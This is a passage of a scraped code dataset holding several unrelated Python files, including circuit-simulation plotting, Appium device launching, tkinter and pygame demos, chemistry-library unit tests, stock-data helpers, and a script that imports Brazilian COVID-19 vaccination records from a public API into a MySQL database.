stop=10e9, numpts=30, sweeptype='logarithm')\nxac = y.run('AC1', xdc)\n\nfreqs = y.get_freqs('AC1')\nvb = y.get_voltage('AC1', 'nb')\nvc = y.get_voltage('AC1', 'nc')\n\nib = i1.ac\nRin = 1. / np.real(ib / vb)\nCin = np.imag(ib / vb) / (2. 
* np.pi * freqs)\n\nplt.figure(figsize=(12,4))\n\nplt.subplot(121)\nplt.ticklabel_format(useOffset=False)\nplt.semilogx(freqs, Rin * 1e-6)\nplt.title('BJT AC Testbench')\nplt.xlabel('Frequency [Hz]')\nplt.ylabel('Rin [MOhms]')\nplt.grid()\n\nplt.subplot(122)\nplt.semilogx(freqs, Cin * 1e12)\nplt.title('BJT AC Testbench')\nplt.xlabel('Frequency [Hz]')\nplt.ylabel('Cin [pF]')\nplt.grid()\nplt.show()\n\n\n","sub_path":"tests/AC_BJT.py","file_name":"AC_BJT.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"193050623","text":"import subprocess\nfrom time import sleep\nimport os\n\n\ndef get_devices():\n output = subprocess.Popen('/home/alexz/Android/Sdk/platform-tools/adb devices', shell=True, stdout=subprocess.PIPE).communicate()[0]\n output = str(output).split('attached')[1]\n output = output.replace(\"\\\\n\", \"\").replace(\"\\\\r\", \"\")\n output = output.replace(\"\\\\t\", \"\")\n output = output.replace(\"'\", \"\")\n output = output.strip()\n output = output.split('device')\n output.pop()\n\n return output\n\n\nfile_with_hotels = 'hotels.txt'\n\n\ndef get_data_from_file(file):\n\n data = open(file, mode='r', encoding='UTF-8')\n read_data = data.read()\n data_without_str = read_data.replace('\"', \"\")\n hotels = data_without_str.split(',')\n data.close()\n\n return hotels\n\n\ndef start():\n devices = get_devices()\n print(devices)\n hotels = get_data_from_file(file_with_hotels)\n print(hotels)\n step = len(hotels)//len(devices)\n begin = 0\n end = step\n if devices:\n appium_port = 4725\n\n for device in devices:\n if device == (devices[0]):\n end = end + len(hotels) % len(devices)\n appium_port += 1\n\n os.system(\"gnome-terminal -e 'bash -c \\\"appium -p {appium_port} -U {device} \\\"'\"\\\n .format(device=device, appium_port=appium_port))\n sleep(10)\n os.system(\"gnome-terminal -e 'bash -c \\\"python tripatvisor_get_info.py {appium_port} {begin} {end}\\\"'\"\\\n .format(appium_port=appium_port, begin=begin, end=end))\n hotels = get_data_from_file(file_with_hotels)\n print(hotels[begin:end])\n print(device)\n print(appium_port)\n print(begin)\n print(end)\n begin = end\n end += step\n\n\n # os.system(\"gnome-terminal -e 'bash -c \\\"appium -p 4723 -U emulator-5556 \\\"'\")\n\nstart()\n\n\n\n\n\n\n\n\n\n\n # os.system(\"gnome-terminal -e 'bash -c \\\"appium -p 4722 -U emulator-5554 \\\"'\")\n #\n # os.system(\"gnome-terminal -e 'bash -c \\\"appium -p 4723 -U emulator-5556 \\\"'\")\n # sleep(10)\n # os.system(\"gnome-terminal -e 'bash -c \\\"python tripatvisor_get_info.py 4722\\\"'\")\n # os.system(\"gnome-terminal -e 'bash -c \\\"python tripatvisor_get_info.py 4723\\\"'\")\n\n\n\n\n\n # subprocess.Popen(['gnome-terminal', 'appium -p 4722 -U emulator-5554 -bp 5232'], shell=True)\n # subprocess.Popen('appium -p 4722 -U emulator-5554 -bp 5232', shell=True)\n # subprocess.Popen('gnome-terminal', shell=True)\n # subprocess.Popen('appium -p 4723 -U emulator-5556 -bp 5234', shell=True)\n\n\n\n\n\n","sub_path":"project_test_file/onetime.py","file_name":"onetime.py","file_ext":"py","file_size_in_byte":2578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"273864908","text":"import tkinter\r\nfrom tkinter import messagebox\r\n\r\ndef btn1clicked():\r\n\tmessagebox.showinfo(title = \"Btn1\", detail = \"btn1 clicked\")\r\n\r\nmywin = tkinter.Tk()\r\nmyframe = tkinter.Frame(mywin)\r\nmyframe.pack()\r\nbutton1 = tkinter.Button(text=\"click1\", 
padx = 25, pady = 10, command = btn1clicked)\r\nbutton1.grid(in_=myframe, row = 0, column = 0, padx =25, pady=10)\r\n\r\nbutton2 = tkinter.Button(myframe , text = \"====button2====\")\r\nbutton2.grid(row = 1, column = 1)\r\n\r\nbutton3 = tkinter.Button(myframe, text = \"button3\")\r\nbutton3.grid(row = 2, column = 1, sticky = 'we')\r\nmywin.mainloop()","sub_path":"courses/w04_py/source/s05/gui/mygrid1.py","file_name":"mygrid1.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"515201270","text":"import helium\nimport unittest\n\nSMILES = helium.Smiles()\n\nclass TestSmarts(unittest.TestCase):\n\n def test_valid_smarts(self):\n smarts = helium.Smarts()\n self.assertTrue(smarts.init('C'))\n self.assertFalse(smarts.error().__nonzero__())\n self.assertEqual(0, len(str(smarts.error())))\n\n def test_invalid_smarts(self):\n smarts = helium.Smarts()\n self.assertFalse(smarts.init('fdsgsgd'))\n self.assertTrue(smarts.error().__nonzero__())\n self.assertNotEqual(0, len(str(smarts.error())))\n\n def test_find_no_mapping_hit(self):\n smarts = helium.Smarts()\n smarts.init('C')\n\n mol = helium.Molecule()\n SMILES.read('CCC', mol)\n\n mapping = helium.NoMapping()\n rings = helium.RingSet(mol)\n\n self.assertTrue(smarts.findMapping(mol, rings, mapping))\n self.assertTrue(mapping.match)\n\n def test_find_no_mapping_miss(self):\n smarts = helium.Smarts()\n smarts.init('N')\n\n mol = helium.Molecule()\n SMILES.read('CCC', mol)\n\n mapping = helium.NoMapping()\n rings = helium.RingSet(mol)\n\n self.assertFalse(smarts.findMapping(mol, rings, mapping))\n self.assertFalse(mapping.match)\n\n def test_find_count_mapping(self):\n smarts = helium.Smarts()\n smarts.init('C')\n\n mol = helium.Molecule()\n SMILES.read('CCC', mol)\n\n mapping = helium.CountMapping()\n rings = helium.RingSet(mol)\n\n self.assertTrue(smarts.findMapping(mol, rings, mapping))\n self.assertEqual(3, mapping.count)\n\n def test_find_single_mapping(self):\n smarts = helium.Smarts()\n smarts.init('c1ccccc1')\n\n mol = helium.Molecule()\n SMILES.read('c1ccccc1-c2ccccc2', mol)\n\n mapping = helium.SingleMapping()\n rings = helium.RingSet(mol)\n\n\n self.assertTrue(smarts.findMapping(mol, rings, mapping))\n self.assertEqual(6, len(mapping.map))\n\n def test_find_mapping_list(self):\n smarts = helium.Smarts()\n smarts.init('c1ccccc1')\n\n mol = helium.Molecule()\n SMILES.read('c1ccccc1-c2ccccc2', mol)\n\n mapping = helium.MappingList()\n rings = helium.RingSet(mol)\n\n self.assertTrue(smarts.findMapping(mol, rings, mapping))\n self.assertEqual(2, len(mapping.maps))\n self.assertEqual(6, len(mapping.maps[0]))\n self.assertEqual(6, len(mapping.maps[1]))\n\n def test_find_unqiue(self):\n smarts = helium.Smarts()\n smarts.init('C.C')\n\n mol = helium.Molecule()\n SMILES.read('C.C', mol)\n\n mapping = helium.MappingList()\n rings = helium.RingSet(mol)\n\n self.assertTrue(smarts.findMapping(mol, rings, mapping))\n self.assertEqual(1, len(mapping.maps))\n self.assertEqual(2, len(mapping.maps[0]))\n\n self.assertTrue(smarts.findMapping(mol, rings, mapping, False))\n self.assertEqual(3, len(mapping.maps))\n self.assertEqual(2, len(mapping.maps[0]))\n self.assertEqual(2, len(mapping.maps[1]))\n self.assertEqual(2, len(mapping.maps[2]))\n\n def test_requires_ring_set(self):\n smarts = helium.Smarts()\n\n smarts.init('C')\n self.assertFalse(smarts.requiresRingSet())\n\n smarts.init('[Nr5]')\n self.assertTrue(smarts.requiresRingSet())\n\n def 
test_requires_explicit_hydrogens(self):\n smarts = helium.Smarts()\n\n smarts.init('C')\n self.assertFalse(smarts.requiresExplicitHydrogens())\n\n smarts.init('[C]([H])')\n self.assertTrue(smarts.requiresExplicitHydrogens())\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/python/smarts.py","file_name":"smarts.py","file_ext":"py","file_size_in_byte":3633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"311826240","text":"import math\r\nimport random\r\nimport time\r\n\r\nimport pygame\r\n\r\npygame.init()\r\n\r\n#vars\r\nclock = pygame.time.Clock()\r\nshipImg = pygame.image.load(\"spaceship.png\")\r\n\r\ndisplay_width = 800\r\ndisplay_height = 450\r\nx = (display_width * 0.45)\r\ny = (display_height * 0.6)\r\nx_change = 0\r\nship_speed = 0\r\nship_width = 106\r\n#display, name\r\n\r\n\r\ngameDisplay = pygame.display.set_mode((display_width,display_height))\r\n\r\npygame.display.set_caption(\"test\")\r\n\r\n#colors\r\nblack = (0,0,0)\r\nwhite = (255, 255, 255)\r\ncyan = (0, 255, 255)\r\nlime = (0, 255, 64)\r\n\r\n#funcs\r\ndef ship(x,y):\r\n gameDisplay.blit(shipImg, (x,y))\r\n\r\ndef things_dodged(count):\r\n font = pygame.font.SysFont(None, 25)\r\n text = font.render(\"Dodged: \"+str(count), True, white)\r\n gameDisplay.blit(text,(0,0))\r\n\r\ndef crash():\r\n message_display(\"You Crashed\")\r\n\r\ndef text_objects(text, font):\r\n textSurface = font.render(text, True, white)\r\n return textSurface, textSurface.get_rect()\r\n\r\ndef obstacle(objectX, objectY): #, objectW, objectH, color):\r\n gameDisplay.blit(pygame.image.load(\"asteroid.png\"), (objectX,objectY)) #pygame.draw.rect(gameDisplay, color, [objectX, objectY, objectW, objectH])\r\n\r\ndef message_display(text):\r\n largeText = pygame.font.Font(\"freesansbold.ttf\",115)\r\n TextSurf, TextRect = text_objects(text, largeText)\r\n TextRect.center = ((display_width/2),(display_height/2))\r\n gameDisplay.blit(TextSurf, TextRect)\r\n pygame.display.update()\r\n time.sleep(2)\r\n game_loop()\r\n \r\ndef game_loop():\r\n x = (display_width * 0.45)\r\n y = (display_height * 0.6)\r\n\r\n x_change = 0\r\n\r\n #obstacle handling\r\n obstacle_startX = random.randrange(0, display_width)\r\n obstacle_startY = -600\r\n obstacle_speed = 7\r\n objectW = 100\r\n objectH = 100\r\n\r\n gameExit = False\r\n\r\n while not gameExit: #while gameExit\r\n\r\n for event in pygame.event.get():\r\n print(event.type)\r\n if event.type == pygame.QUIT:\r\n gameExit = True\r\n\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_LEFT:\r\n x_change = -7\r\n if event.key == pygame.K_RIGHT:\r\n x_change = 7\r\n\r\n if event.type == pygame.KEYUP:\r\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\r\n x_change = 0\r\n\r\n x += x_change\r\n\r\n gameDisplay.fill(black)\r\n ship(x,y)\r\n\r\n #obstacle spawning\r\n obstacle(obstacle_startX, obstacle_startY)#, objectW, objectH, cyan) #(random.randint(0,255),random.randint(0,255),random.randint(0,255)))\r\n obstacle_startY += obstacle_speed\r\n ship(x,y)\r\n\r\n if x > display_width - ship_width or x < 0:\r\n crash()\r\n\r\n #if obstacle_startY > display_height:\r\n #obstacle_startY = 0 - objectH\r\n #obstacle_startX = random.randrange(0,display_width)\r\n\r\n if obstacle_startY == 0 - objectH:\r\n obstacle_startY = 0 - objectH\r\n obstacle_startX = random.randrange(0,display_width)\r\n dodged +=1\r\n obstacle_speed += 1\r\n objectW += (dodged *1.2)\r\n\r\n #collision handling\r\n if y < obstacle_startY + 50:\r\n 
print('Y Crossover')\r\n\r\n if x > obstacle_startX and x < obstacle_startX + 50 or x + 106 > obstacle_startX and x + 106 < obstacle_startX + 50:\r\n print(\"X Crossover, confirmed crash\")\r\n crash()\r\n \r\n pygame.display.update()\r\n clock.tick(60)\r\n\r\ngame_loop()\r\n\r\npygame.quit()\r\nquit()\r\n","sub_path":"Seniors/platformertest.py","file_name":"platformertest.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"209778837","text":"# -*- coding: UTF-8 -*-\nimport datetime\nfrom pandas.tseries.offsets import *\n\nimport xlrd\nimport pandas as pd\nimport os\nimport time\n\nDATA_DIR = 'data'\nONE_HOUR_SECONDS = 60 * 60\n\n\n# 获取股票代码列表\ndef get_stocks(config=None):\n if config:\n data = xlrd.open_workbook(config)\n table = data.sheets()[0]\n rows_count = table.nrows\n codes = table.col_values(0)[1:rows_count-1]\n names = table.col_values(1)[1:rows_count-1]\n return list(zip(codes, names))\n else:\n data_files = os.listdir(DATA_DIR)\n stocks = []\n for file in data_files:\n code_name = file.split(\".\")[0]\n code = code_name.split(\"-\")[0]\n name = code_name.split(\"-\")[1]\n appender = (code, name)\n stocks.append(appender)\n return stocks\n\n\n# 读取本地数据文件\ndef read_data(code_name):\n stock = code_name[0]\n name = code_name[1]\n file_name = stock + '-' + name + '.h5'\n try:\n return pd.read_hdf(DATA_DIR + \"/\" + file_name)\n except FileNotFoundError:\n return\n\n\n# 是否需要更新数据\ndef need_update_data():\n try:\n code_name = ('000001', '平安银行')\n data = read_data(code_name)\n if data.empty:\n return True\n else:\n start_time = next_weekday(data.iloc[-1].date)\n current_time = datetime.datetime.now()\n if start_time > current_time:\n return False\n except FileNotFoundError:\n return True\n\n\n# 是否是工作日\ndef is_weekday():\n return datetime.datetime.today().weekday() < 5\n\n\ndef next_weekday(date):\n return pd.to_datetime(date) + BDay()\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"75700357","text":"#!path+=**/Python/3.7/bin:Google\\ Chrome.app/Contents/MacOS\n# Please download\n# geckodriver from, This is a macos download link straight to the zip\n# https://github.com/mozilla/geckodriver/releases/download/v0.24.0/geckodriver-v0.24.0-macos.tar.gz\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport selenium.webdriver.chrome.service as service\n\nimport time\n\n\nclass GoogleBot:\n def __init__(self, search_item):\n self.bot = service.Service(\n '**/Applications/Google\\ Chrome.app/Contents/MacOS')\n self.search = search_item\n\n def search(self):\n search_input = self.search\n bot = self.bot\n bot.start()\n capabilities = {\n 'chrome.binary': '**/Google\\ Chrome\\ Canary.app/Contents/MacOS'}\n driver = webdriver.Remote(service.service_url, capabilities)\n driver.get('http://www.google.com/xhtml')\n time.sleep(5)\n # searchbar = bot.find_element_by_class_name(\"gLFyfgsfi\")\n # searchbar.clear()\n # searchbar.send_keys(search_input)\n\n\ngs = GoogleBot(\"NBA\")\ngs.search()\n\n","sub_path":"twitter-bot-python/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"99994774","text":"import pandas as pd\r\nimport database as db\r\nimport math\r\nimport time\r\nimport traceback\r\nfrom datetime import 
datetime\r\nimport requests\r\nimport json\r\nfrom datetime import date\r\nimport pandas as pd\r\n\r\n\r\nstart = time.time()\r\ndb.execute('SET GLOBAL innodb_lock_wait_timeout = 5000;')\r\ndb.execute('SET innodb_lock_wait_timeout = 5000;')\r\n\r\n# TODO: importar dados corretamente\r\n# TODO: criar o MER\r\n# TODO: criar um front?\r\n# TODO: documentar processo e obstaculos\r\n\r\n# Get incoming data\r\n#variável utilizada quando usamos CSV\r\npath=r'C:\\Users\\Victor\\Documents\\Periodo 2020.2\\Bioinformática\\part-00000-8feada9c-2005-4fe0-b2a5-9f51647d7637.c000 - Copia.csv'\r\n\r\n\r\nurl = \"https://imunizacao-es.saude.gov.br/_search\"\r\ndata_hoje = str(date.today())\r\npayload = json.dumps({\r\n \"size\": 10000, # máximo de registros em uma query \r\n\"query\": {\r\n \"bool\" : {\r\n \"must\" : {\r\n \"match\": {\"estabelecimento_uf\": \"ac\"}\r\n },\r\n \"filter\": {\r\n \"range\" : {\r\n \"vacina_dataAplicacao\" : {\r\n \"gte\": \"2021-05-13\",\r\n \"lte\": data_hoje,\r\n \"format\": \"yyyy-MM-dd\"\r\n }\r\n }\r\n }\r\n }\r\n}\r\n#,\r\n# \"fields\": [\r\n# \"vacina_dataAplicacao\",\r\n# \"estabelecimento_uf\"\r\n# ],\r\n# \"_source\": False\r\n}\r\n\r\n)\r\nheaders = {\r\n 'Authorization': 'Basic aW11bml6YWNhb19wdWJsaWM6cWx0bzV0JjdyX0ArI1Rsc3RpZ2k=',\r\n 'Content-Type': 'application/json',\r\n 'Cookie': 'ELASTIC-PROD=1621895938.823.19618.765660'\r\n}\r\n\r\n\r\nresponse = requests.request(\"POST\", url, headers=headers, data=payload)\r\nres = response.json()\r\nres = res['hits']['hits']\r\nlista = list()\r\n#colocando todos os registros em uma lista para transformar em dataframe\r\nfor i in res:\r\n lista.append(i['_source'])\r\ndata = pd.json_normalize(lista)\r\n\r\n#transformando nomes das colunas em minusculas \r\ncolumn_name = list()\r\nfor col in data.columns:\r\n column_name.append(col.lower())\r\n\r\ndata.columns = column_name \r\n\r\n#data = pd.read_csv(path, delimiter=\";\", encoding='utf8')\r\n\r\n# Renomeia colunas utilizadas\r\ncols = {\r\n 'document_id': 'id',\r\n 'paciente_id': 'paciente_id', \r\n 'paciente_datanascimento': 'paciente_data_nascimento', \r\n 'paciente_enumsexobiologico': 'paciente_sexo', \r\n 'paciente_enumSexoBiologico': 'paciente_sexo', \r\n 'paciente_racacor_codigo': 'paciente_raca_codigo', \r\n 'paciente_racaCor_codigo' : 'paciente_raca_codigo', \r\n 'paciente_racacor_valor': 'paciente_raca_nome', \r\n 'paciente_racaCor_valor' : 'paciente_raca_nome', \r\n 'paciente_endereco_coibgemunicipio': 'paciente_municipio_codigo', \r\n 'paciente_endereco_nmmunicipio': 'paciente_municipio_nome', \r\n 'paciente_endereco_copais': 'paciente_pais_codigo',\r\n 'paciente_endereco_coPais': 'paciente_pais_codigo',\r\n 'paciente_endereco_nmpais': 'paciente_pais_nome',\r\n 'paciente_endereco_nmPais': 'paciente_pais_nome',\r\n 'paciente_endereco_uf': 'paciente_estado',\r\n 'paciente_endereco_cep': 'paciente_cep',\r\n 'paciente_nacionalidade_enumnacionalidade': 'paciente_nacionalidade',\r\n 'paciente_nacionalidade_enumNacionalidade': 'paciente_nacionalidade',\r\n 'estabelecimento_valor': 'estabelecimento_codigo',\r\n 'estabelecimento_razaosocial': 'estabelecimento_razao_social',\r\n 'estalecimento_nofantasia': 'estabelecimento_nome',\r\n 'estabelecimento_municipio_codigo': 'estabelecimento_municipio_codigo',\r\n 'estabelecimento_municipio_nome': 'estabelecimento_municipio_nome',\r\n 'estabelecimento_uf': 'estabelecimento_estado',\r\n 'vacina_grupoatendimento_codigo': 'grupo_atendimento_codigo',\r\n 'vacina_grupoatendimento_nome': 'grupo_atendimento_nome',\r\n 
'vacina_categoria_codigo': 'vacina_categoria_codigo',\r\n 'vacina_categoria_nome': 'vacina_categoria_nome',\r\n 'vacina_lote': 'vacina_lote',\r\n 'vacina_fabricante_nome': 'fabricante_nome',\r\n 'vacina_fabricante_referencia': 'fabricante_referencia',\r\n 'vacina_dataaplicacao': 'data_aplicacao',\r\n 'vacina_descricao_dose': 'descricao_dose',\r\n 'vacina_codigo': 'vacina_codigo',\r\n 'vacina_nome': 'vacina_nome',\r\n 'sistema_origem': 'sistema_origem',\r\n 'data_importacao_rnds': 'data_importacao_rnds'\r\n}\r\n\r\n# Remove colunas não utilizadas\r\nnon_used_columns = list(set(data.columns) - set(cols.keys()))\r\ndata = data.drop(columns=non_used_columns)\r\ndata.rename(columns=cols, inplace=True)\r\n#data.to_csv(\"output_1.csv\",sep=\";\")\r\n\r\ndef format_date(date_str):\r\n try:\r\n if(len(date_str) < 6):\r\n raise Exception()\r\n return f\"'{date_str}'\"\r\n except Exception as e:\r\n return 'NULL'\r\n\r\n\r\n# Pega dados no banco de dados, serão usados para atribuir as chaves estrangeiras\r\nprint('Fetching database data.')\r\npacientes_db = db.query('SELECT id, sexo_id FROM pacientes').set_index('id')\r\nracas_db = db.query('SELECT id, nome FROM racas').set_index('id')\r\nsexos_db = db.query('SELECT id, codigo FROM sexos').set_index('codigo')\r\nnacionalidades_db = db.query('SELECT id, codigo FROM nacionalidades').set_index('codigo')\r\npaises_db = db.query('SELECT id, codigo FROM paises').set_index('codigo')\r\nestados_db = db.query('SELECT id, codigo FROM estados').set_index('codigo')\r\nmunicipios_db = db.query('SELECT id, codigo FROM municipios').set_index('codigo')\r\nfabricantes_db = db.query('SELECT id, referencia FROM fabricantes').set_index('referencia')\r\ngrupos_de_atendimento_db = db.query('SELECT id, nome FROM grupos_de_atendimento').set_index('id')\r\ncategorias_db = db.query('SELECT id, nome FROM categorias').set_index('id')\r\nvacinas_db = db.query('SELECT id, nome FROM vacinas').set_index('id')\r\nsistemas_db = db.query('SELECT id, nome FROM sistemas').set_index('nome')\r\nestabelecimentos_db = db.query('SELECT id, estado_id FROM estabelecimentos').set_index('id')\r\ntipos_de_dose_db = db.query('SELECT id, descricao FROM tipos_de_dose').set_index('descricao')\r\n\r\n\r\n# A funções abaixo servem para criar as colunas de chave estrangeiras, que irão ligar um dado a uma outra tabela\r\n# 1. Verifica se o dado ja existe no BD\r\n# 2. Se já existe pega o ID, se nao existe insere e pega o ID\r\n# 3. 
Atualiza a tabela local pra garantir a validade das próximas verificações\r\n\r\n\r\ndef add_column_sexo_id(sexo):\r\n sexo = sexo.upper() if type(sexo) == str else 99\r\n if(sexo in sexos_db.index):\r\n return sexos_db.loc[sexo]['id']\r\n else:\r\n id = db.execute(f'''INSERT INTO sexos(codigo, nome) VALUES ('{sexo}', '{sexo}')''')\r\n sexos_db.loc[sexo] = [None]\r\n return id\r\n\r\ndef add_column_raca_id(row):\r\n raca_id = row['paciente_raca_codigo']\r\n raca_id = 99 if math.isnan(int(raca_id)) else int(raca_id)\r\n raca_nome = row['paciente_raca_nome']\r\n if(raca_id in racas_db.index):\r\n return raca_id\r\n else:\r\n id = db.execute(f'''INSERT INTO racas(id, nome) VALUES ('{raca_id}', '{raca_nome}')''')\r\n racas_db.loc[raca_id] = [None]\r\n return raca_id\r\n\r\ndef add_column_nacionalidade_id(nacionalidade):\r\n nacionalidade = nacionalidade.upper() if type(nacionalidade) == str else '99'\r\n if(nacionalidade in nacionalidades_db.index):\r\n return nacionalidades_db.loc[nacionalidade]['id']\r\n else:\r\n id = db.execute(f'''INSERT INTO nacionalidades(codigo, nome) VALUES ('{nacionalidade}', '{nacionalidade}')''')\r\n nacionalidades_db.loc[nacionalidade] = [None]\r\n return id\r\n\r\ndef add_column_municipio_id(row):\r\n municipio_id = row['paciente_municipio_codigo']\r\n if municipio_id=='':\r\n municipio_id=9999\r\n #print(municipio_id)\r\n municipio_id = 9999 if math.isnan(int(municipio_id)) else int(municipio_id)\r\n municipio_nome = row['paciente_municipio_nome'].replace(\"'\", '') if type(row['paciente_municipio_nome']) == str else ''\r\n if(municipio_id in municipios_db.index):\r\n return municipios_db.loc[municipio_id]['id']\r\n else:\r\n id = db.execute(f'''INSERT INTO municipios(codigo, nome) VALUES ('{municipio_id}', '{municipio_nome}')''')\r\n municipios_db.loc[municipio_id] = [None]\r\n return id\r\n\r\ndef add_column_estado_id(estado):\r\n estado = estado.upper() if type(estado) == str else 99\r\n if(estado in estados_db.index):\r\n return estados_db.loc[estado]['id']\r\n else:\r\n id = db.execute(f'''INSERT INTO estados(codigo, nome) VALUES ('{estado}', '{estado}')''')\r\n estados_db.loc[estado] = [None]\r\n return id\r\n\r\n\r\n\r\ndef add_column_pais_id(row):\r\n pais_id = row['paciente_pais_codigo']\r\n if pais_id=='':\r\n pais_id=999\r\n pais_id = 999 if math.isnan(int(pais_id)) else int(pais_id)\r\n pais_nome = row['paciente_pais_nome']\r\n if(pais_id in paises_db.index):\r\n return paises_db.loc[pais_id]['id']\r\n else:\r\n id = db.execute(f'''INSERT INTO paises(codigo, nome) VALUES ('{pais_id}', '{pais_nome}')''')\r\n paises_db.loc[pais_id] = [None]\r\n return id\r\n\r\ndef add_column_estabelecimento_municipio_id(row):\r\n est_municipio_id = row['estabelecimento_municipio_codigo']\r\n est_municipio_id = 9999 if math.isnan(est_municipio_id) else int(est_municipio_id)\r\n est_municipio_nome = row['estabelecimento_municipio_nome'].replace(\"'\", '') if type(row['estabelecimento_municipio_nome']) == str else ''\r\n if(est_municipio_id in municipios_db.index):\r\n return municipios_db.loc[est_municipio_id]['id']\r\n else:\r\n id = db.execute(f'''INSERT INTO municipios(codigo, nome) VALUES ('{est_municipio_id}', '{est_municipio_nome}')''')\r\n municipios_db.loc[est_municipio_id] = [None]\r\n return id\r\n\r\ndef add_column_estabelecimento_estado_id(estado):\r\n estado = estado.upper() if type(estado) == str else 99\r\n if(estado in estados_db.index):\r\n return estados_db.loc[estado]['id']\r\n else:\r\n id = db.execute(f'''INSERT INTO estados(codigo, nome) VALUES 
('{estado}', '{estado}')''')\r\n estados_db.loc[estado] = [None]\r\n return id\r\n\r\ndef add_column_estabelecimento_id(row):\r\n est_id = row['estabelecimento_codigo']\r\n if est_id=='':\r\n est_id=9999\r\n est_id = 99999 if math.isnan(int(est_id)) else int(est_id)\r\n est_razao_social = row['estabelecimento_razao_social']\r\n est_nome = row['estabelecimento_nome']\r\n est_estado_id = row['estabelecimento_estado_id']\r\n est_municipio_id = row['estabelecimento_municipio_id']\r\n if(est_id in estabelecimentos_db.index):\r\n return est_id\r\n else:\r\n id = db.execute(f'''INSERT INTO estabelecimentos(id, razao_social, nome, municipio_id, estado_id) VALUES ({est_id}, '{est_razao_social}', '{est_nome}', '{est_municipio_id}', '{est_estado_id}')''')\r\n estabelecimentos_db.loc[est_id] = [None]\r\n return est_id\r\n\r\ndef add_column_vacina_id(row):\r\n vacina_id = row['vacina_codigo']\r\n if( vacina_id=='' or vacina_id==None):\r\n vacina_id=99\r\n vacina_id = 99 if math.isnan(int(vacina_id)) else int(vacina_id)\r\n vacina_nome = row['vacina_nome']\r\n if(vacina_id in vacinas_db.index):\r\n return vacina_id\r\n else:\r\n id = db.execute(f'''INSERT INTO vacinas(id, nome) VALUES ('{vacina_id}', '{vacina_nome}')''')\r\n vacinas_db.loc[vacina_id] = [None]\r\n return vacina_id\r\n\r\ndef add_column_categoria_id(row):\r\n categoria_id = row['vacina_categoria_codigo']\r\n if categoria_id=='' or categoria_id ==None:\r\n categoria_id = 99 \r\n #print(categoria_id) \r\n categoria_id = 99 if math.isnan(int(categoria_id)) else int(categoria_id)\r\n categoria_nome = row['vacina_categoria_nome']\r\n if(categoria_id in categorias_db.index):\r\n return categoria_id\r\n else:\r\n id = db.execute(f'''INSERT INTO categorias(id, nome) VALUES ('{categoria_id}', '{categoria_nome}')''')\r\n categorias_db.loc[categoria_id] = [None]\r\n return categoria_id\r\n\r\ndef add_column_grupo_de_atendimento_id(row):\r\n grp_atd_id = row['grupo_atendimento_codigo']\r\n if grp_atd_id=='' or grp_atd_id ==None:\r\n grp_atd_id = 99 \r\n else:\r\n grp_atd_id=int(grp_atd_id)\r\n grp_atd_id = 99 if math.isnan(grp_atd_id) else int(grp_atd_id)\r\n grp_atd_nome = row['grupo_atendimento_nome']\r\n if(grp_atd_id in grupos_de_atendimento_db.index):\r\n return grp_atd_id\r\n else:\r\n id = db.execute(f'''INSERT INTO grupos_de_atendimento(id, nome) VALUES ('{grp_atd_id}', '{grp_atd_nome}')''')\r\n grupos_de_atendimento_db.loc[grp_atd_id] = [None]\r\n return grp_atd_id\r\n\r\ndef add_column_sistema_id(sistema):\r\n sistema = sistema.upper()\r\n if(sistema in sistemas_db.index):\r\n return sistemas_db.loc[sistema]['id']\r\n else:\r\n id = db.execute(f'''INSERT INTO sistemas(nome) VALUES ('{sistema}')''')\r\n sistemas_db.loc[sistema] = [None]\r\n return id\r\n\r\ndef add_column_fabricante_id(row):\r\n fabricante_id = row['fabricante_referencia'].upper() if type(row['fabricante_referencia']) == str else '99'\r\n fabricante_nome = 'Sem referencia' if fabricante_id == '99' else row['fabricante_nome']\r\n if(fabricante_id in fabricantes_db.index):\r\n return fabricantes_db.loc[fabricante_id]['id']\r\n else:\r\n id = db.execute(f'''INSERT INTO fabricantes(referencia, nome) VALUES ('{fabricante_id}', '{fabricante_nome}')''')\r\n fabricantes_db.loc[fabricante_id] = [None]\r\n return id\r\n\r\ndef add_column_tipo_de_dose_id(dose):\r\n tipo_de_dose_id = dose.upper() if type(dose) == str else '99'\r\n if(tipo_de_dose_id in tipos_de_dose_db.index):\r\n return tipos_de_dose_db.loc[tipo_de_dose_id]['id']\r\n else:\r\n id = db.execute(f'''INSERT INTO 
tipos_de_dose(descricao) VALUES ('{tipo_de_dose_id}')''')\r\n print('tipo de dose:', tipo_de_dose_id, id)\r\n tipos_de_dose_db.loc[tipo_de_dose_id] = [None]\r\n return id\r\n\r\ndef register_pacientes(row):\r\n paciente_id = row['paciente_id']\r\n data_nascimento = format_date(row['paciente_data_nascimento'])\r\n sexo_id = row['paciente_sexo_id']\r\n raca_id = row['paciente_raca_id']\r\n nacionalidade_id = row['paciente_nacionalidade_id']\r\n pais_id = row['paciente_pais_id']\r\n estado_id = row['paciente_estado_id']\r\n municipio_id = row['paciente_municipio_id']\r\n cep = row['paciente_cep']\r\n if(paciente_id in pacientes_db.index):\r\n return paciente_id\r\n else:\r\n id = db.execute(f'''INSERT INTO pacientes(\r\n id, data_nascimento, sexo_id, raca_id, nacionalidade_id, pais_id, estado_id, municipio_id, cep)\r\n VALUES ('{paciente_id}', {data_nascimento}, '{sexo_id}', '{raca_id}', '{nacionalidade_id}', '{pais_id}', '{estado_id}', '{municipio_id}', '{cep}')''')\r\n pacientes_db.loc[paciente_id] = [None]\r\n return id\r\n\r\ndef register_data(row):\r\n id = row['id']\r\n paciente_id = 